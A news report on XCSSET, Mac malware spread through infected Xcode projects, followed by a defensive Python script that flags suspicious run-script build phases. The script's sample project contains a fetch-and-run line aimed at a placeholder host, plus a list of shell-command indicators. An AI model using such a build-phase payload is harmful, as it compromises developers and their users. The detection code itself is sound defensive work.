A new form of Mac malware that can “command and control” a targeted computer is being injected into Xcode projects. The malware was discovered by security researchers at Trend Micro.
The researchers describe the malware, which is part of the XCSSET family, as “an unusual infection related to Xcode developer projects.” It is unusual because of how it infects machines: the malicious code is injected into Xcode projects, and it runs when the project is built. Trend Micro says this leads to “a rabbit hole of malicious payloads.”
“This poses a risk for Xcode developers in particular. The threat escalates since we have identified affected developers who shared their projects on GitHub, leading to a supply-chain-like attack for users who rely on these repositories as dependencies in their own projects. We have also identified this threat in sources such as VirusTotal, which indicates this threat is at large.”
The malware was found to be capable of abusing Safari and other browsers to steal data. It uses a vulnerability to read and dump cookies, create backdoors in JavaScript, and modify displayed websites. It can steal private banking information, block password change attempts, and steal newly changed passwords.
The malware is capable of stealing information from apps, including Notes, Skype, Evernote, WeChat, and others. It has the ability to encrypt files and display a ransom note, or quietly take screenshots, and upload files to a server of the attacker’s choice.
Developers may be unknowingly distributing the trojan to their users in the form of compromised Xcode projects and built applications. Trend Micro urges users to only download apps from official marketplaces and to ensure they have multi-layered security solutions in place.
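As an added, defender-side illustration that is not part of Trend Micro's report or this article: because the malicious code runs when a project is built, one place to audit in a shared or downloaded Xcode project is its run-script build phases, the build-phase type Xcode uses to run arbitrary commands during a build. The Python script below lists the PBXShellScriptBuildPhase entries in a project.pbxproj file and flags scripts that download or decode code at build time; the sample project text, the indicator list and the payload.invalid host are constructed for the example, and the page does not say how XCSSET itself injects its code.

```python
import re
# One entry in the `objects` section of project.pbxproj: indent, 24-hex ID,
# optional /* comment */, then a body closed by `};` at the same indent.
OBJECT_RE = re.compile(
    r'^([ \t]+)([0-9A-F]{24})(?: /\* (.*?) \*/)? = \{\n(.*?)\n\1\};', re.M | re.S)

# Assumed indicators of a run-script phase that fetches or decodes code at build time.
SUSPICIOUS = ["curl ", "wget ", "base64 -", "| sh", "| bash", "eval ",
              "osascript", "python -c", "chmod +x", "/tmp/"]

# Constructed project.pbxproj excerpt (not a real project): a benign phase and a bad one.
SAMPLE_PBXPROJ = r"""// !$*UTF8*$!
{
    objects = {
        A1B2C3D4E5F60718293A4B5C /* Lint */ = {
            isa = PBXShellScriptBuildPhase;
            name = Lint;
            shellScript = "echo \"Building ${CONFIGURATION}\"\n";
        };
        0F1E2D3C4B5A69788796A5B4 /* Run Script */ = {
            isa = PBXShellScriptBuildPhase;
            shellScript = "curl -fsSL http://payload.invalid/x | sh\n";
        };
        FFEEDDCCBBAA998877665544 /* Sources */ = {
            isa = PBXSourcesBuildPhase;
            files = ();
        };
    };
}
"""

def _field(body: str, key: str) -> str:
    """Read `key = value;` from an object body, unescaping a quoted pbxproj string."""
    m = re.search(r'^\s*%s = (?:"((?:\\.|[^"\\])*)"|([^;]+));' % key, body, re.M)
    if m is None:
        return ""
    if m.group(1) is None:  # unquoted value such as `name = Lint;`
        return m.group(2).strip()
    return re.sub(r'\\(.)', lambda e: {"n": "\n", "t": "\t"}.get(e[1], e[1]), m.group(1))

def run_script_phases(pbxproj: str) -> list:
    """Return every PBXShellScriptBuildPhase with its script and matched indicators."""
    phases = []
    for _indent, obj_id, comment, body in OBJECT_RE.findall(pbxproj):
        if "isa = PBXShellScriptBuildPhase;" not in body:
            continue  # compile, link and copy phases do not run shell commands
        script = _field(body, "shellScript")
        phases.append({"id": obj_id, "name": comment or _field(body, "name") or "(unnamed)",
                       "script": script, "indicators": [s for s in SUSPICIOUS if s in script]})
    return phases
```

Run it against `project.pbxproj` inside a downloaded `.xcodeproj` bundle before building; any phase with a non-empty indicator list deserves a manual read of its script.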
(Via MacRumors)